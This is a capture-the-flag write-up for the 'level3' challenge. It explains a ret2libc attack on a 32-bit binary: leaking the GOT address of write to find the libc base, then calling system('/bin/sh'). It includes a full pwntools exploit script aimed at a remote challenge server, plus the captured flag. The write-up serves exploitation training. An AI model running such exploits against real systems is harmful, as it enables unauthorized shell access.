After decompression, there is a level3 and libc_32.so.6, dragged into ida (32-bit)
are mainly these two functions,
the basic idea of a write and a read problem is to put the write function in the got table through the first overflow Address leaks, then subtract the offset in libc_32.so.6 to get the base address, add the system found in ibc_32.so.6 and the "/bin/sh" offset to get the real address, and then execute Once the main function overflows
for the second time . There are many ways to get the offset address of the write and system functions.
Drag libc_32.so.6 into ida, you can find the offset of the write function and the system function:
look for "/bin/ sh" (you can also find with winhex)
write.plt and main.pltt can be found in ida
In addition to these, I also learned methods from other people's wp, as follows
from pwn import *
from LibcSeacher import *
p=remote('111.198.29.45',47340)
elf=ELF('./level3')
libc=ELF('./libc_32.so.6')
#write_plt=0x08048340
write_plt=elf.plt['write']
write_got=elf.got['write']
#main_addr=0x08048484
main_addr=elf.symbols['main']
#填充字符+write函数地址+main函数地址+write函数的三个参数
payload1='a' * 0x8c + p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendlineafter("Input:\n",payload1)
#接收write函数在got表中的地址
write_real=u32(p.recv()[:4])
#system_off=0x3a940
system_off=libc.symbols['system']
#bin_off=0x15902b
bin_off=libc.search('/bin/sh').next()
#write_off=0xd43c0
write_off=libc.symbols['write']
#计算基地址
lib_addr=write_real-write_off
#计算system地址
system_addr=lib_addr+system_off
#计算'/bin/sh'地址
bin_addr=lib_addr+bin_off
#填充字符+system地址+这里不用考虑,随意填充4个字节+'/bin/sh'地址
payload2='a'*0x8c+p32(system_addr)+'aaaa'+p32(bin_addr)
p.sendline(payload2)
p.interactive()flag:cyberpeace{e808c04302e73cdc5159eef2dcd92f48}
